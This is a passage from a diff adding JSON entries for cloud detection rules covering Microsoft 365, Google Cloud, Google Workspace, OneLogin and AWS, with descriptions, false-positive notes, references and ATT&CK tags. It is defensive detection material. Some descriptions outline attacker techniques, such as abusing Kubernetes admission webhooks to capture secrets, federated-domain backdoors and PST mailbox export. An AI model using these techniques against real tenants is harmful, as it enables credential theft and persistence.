+ "attack.impact" + ] + }, + "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", + "value": "Activity Performed by Terminated User" + }, + { + "description": "Alert for the addition of a new federated domain.", + "meta": { + "author": "@ionsor", + "creation_date": "2022/02/08", + "falsepositive": [ + "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a 
similar or different cloud provider." + ], + "filename": "microsoft365_new_federated_domain_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://www.sygnia.co/golden-saml-advisory", + "https://o365blog.com/post/aadbackdoor/", + "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.003" + ] + }, + "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", + "value": "New Federated Domain Added" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_logon_from_risky_ip_address.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", + "value": "Logon from a Risky IP Address" + }, + { + "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. 
This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", + "meta": { + "author": "Nikita Khalimonenkov", + "creation_date": "2022/11/17", + "falsepositive": [ + "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." + ], + "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "6897cd82-6664-11ed-9022-0242ac120002", + "value": "PST Export Alert Using New-ComplianceSearchAction" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_unusual_volume_of_file_deletion.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", + "value": "Microsoft 365 - Unusual Volume of File Deletion" + }, + { + "description": "Detects when a Security 
Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_user_restricted_from_sending_email.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1199" + ] + }, + "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", + "value": "Microsoft 365 - User Restricted from Sending Email" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", + "value": "Suspicious OAuth App File Download Activities" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login 
associated with an impossible travel.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2020/07/06", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_impossible_travel_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", + "value": "Microsoft 365 - Impossible Travel Activity" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_potential_ransomware_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", + "value": "Microsoft 365 - Potential Ransomware Activity" + }, + { + "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. 
This PST file usually has sensitive information including email body content", + "meta": { + "author": "Sorina Ionescu", + "creation_date": "2022/02/08", + "falsepositive": [ + "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." + ], + "filename": "microsoft365_pst_export_alert.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", + "value": "PST Export Alert Using eDiscovery Alert" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_activity_from_infrequent_country.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "0f2468a2-5055-4212-a368-7321198ee706", + "value": "Activity from Infrequent Country" + }, + { + "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + 
"Unknown" + ], + "filename": "gcp_dns_zone_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/dns/docs/reference/v1/managedZones", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", + "value": "Google Cloud DNS Zone Modified or Deleted" + }, + { + "description": "Identifies when the Secrets are Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/09", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", + "value": "Google Cloud Kubernetes Secrets Modified or Deleted" + }, + { + "description": "Detect when a Cloud SQL DB has been modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/15", + "falsepositive": [ + "SQL Database being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_sql_database_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", + "value": "Google Cloud SQL Database Modified or Deleted" + }, + { + "description": "Identifies when a service account is modified in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Service Account being modified may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_service_account_modified.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", + "value": "Google Cloud Service Account Modified" + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/09", + "falsepositive": [ + "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_kubernetes_rolebinding.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", + "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", + "https://github.com/elastic/detection-rules/pull/1267", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", + "value": "Google Cloud Kubernetes RoleBinding" + }, + { + "description": "Detects when storage bucket is enumerated in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_bucket_enumeration.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", + "value": "Google Cloud Storage Buckets Enumeration" + }, + { + "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. 
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/22", + "falsepositive": [ + "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_kubernetes_cronjob.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://cloud.google.com/kubernetes-engine/docs", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ] + }, + "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", + "value": "Google Cloud Kubernetes CronJob" + }, + { + "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "VPN Tunnel being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", + "value": "Google Cloud VPN Tunnel Modified or Deleted" + }, + { + "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/13", + "falsepositive": [ + "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", + "Exceptions can be added to this rule to filter expected behavior." + ], + "filename": "gcp_firewall_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", + "value": "Google Cloud Firewall Modified or Deleted" + }, + { + "description": "Identifies when sensitive information is re-identified in google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "gcp_dlp_re_identifies_sensitive_information.yml", + "level": "medium", + "logsource.category": "No established category", + 
"logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ] + }, + "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", + "value": "Google Cloud Re-identifies Sensitive Information" + }, + { + "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_kubernetes_admission_controller.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ] + }, + "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", + "value": "Google Cloud Kubernetes Admission Controller" + }, + { + "description": "Identifies when a service account is disabled or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_service_account_disabled_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", + "value": "Google Cloud Service Account Disabled or Deleted" + }, + { + "description": "Detects when storage bucket is modified or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Storage Buckets being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_bucket_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", + "value": "Google Cloud Storage Buckets Modified or Deleted" + }, + { + "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/13", + "falsepositive": [ + "Full Network Packet Capture may be done by a system or network administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_full_network_traffic_packet_capture.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074" + ] + }, + "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", + "value": "Google Full Network Traffic Packet Capture" + }, + { + "description": "Detects when an an application is removed from Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/26", + "falsepositive": [ + "Application being removed may be performed by a System Administrator." + ], + "filename": "gworkspace_application_removed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", + "value": "Google Workspace Application Removed" + }, + { + "description": "Detects when an Google Workspace user is granted admin privileges.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/23", + "falsepositive": [ + "Google Workspace admin role privileges, may be modified by system administrators." 
+ ], + "filename": "gworkspace_user_granted_admin_privileges.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", + "value": "Google Workspace User Granted Admin Privileges" + }, + { + "description": "Detects when an a role is modified or deleted in Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_role_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", + "value": "Google Workspace Role Modified or Deleted" + }, + { + "description": "Detects when an a role privilege is deleted in Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_role_privilege_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", 
+ "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", + "value": "Google Workspace Role Privilege Deleted" + }, + { + "description": "Detects when multi-factor authentication (MFA) is disabled.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/26", + "falsepositive": [ + "MFA may be disabled and performed by a system administrator." + ], + "filename": "gworkspace_mfa_disabled.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", + "value": "Google Workspace MFA Disabled" + }, + { + "description": "Detects when an API access service account is granted domain authority.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_granted_domain_api_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", + "value": "Google Workspace Granted Domain API Access" + }, + { + "description": "Detects when an user assumed another user account.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "onelogin_assumed_another_user.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "onelogin", + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", + "value": "OneLogin User Assumed Another User" + }, + { + "description": "Detects when an user account is locked or suspended.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "System may lock or suspend user accounts." + ], + "filename": "onelogin_user_account_locked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "onelogin", + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", + "value": "OneLogin User Account Locked" + }, + { + "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A S3 configuration change may be done by a system or network administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "aws_s3_data_management_tampering.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html",
+ "https://github.com/elastic/detection-rules/pull/1145/files",
+ "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1537"
+ ]
+ },
+ "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d",
+ "value": "AWS S3 Data Management Tampering"
+ },
+ {
+ "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n",
+ "meta": {
+ "author": "Sittikorn S",
+ "creation_date": "2021/06/29",
+ "falsepositive": [
+ "System Administrator Activities",
+ "DEV, UAT, SAT environment. You should apply this rule with PROD account only." 
+ ],
+ "filename": "aws_ec2_disable_encryption.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html",
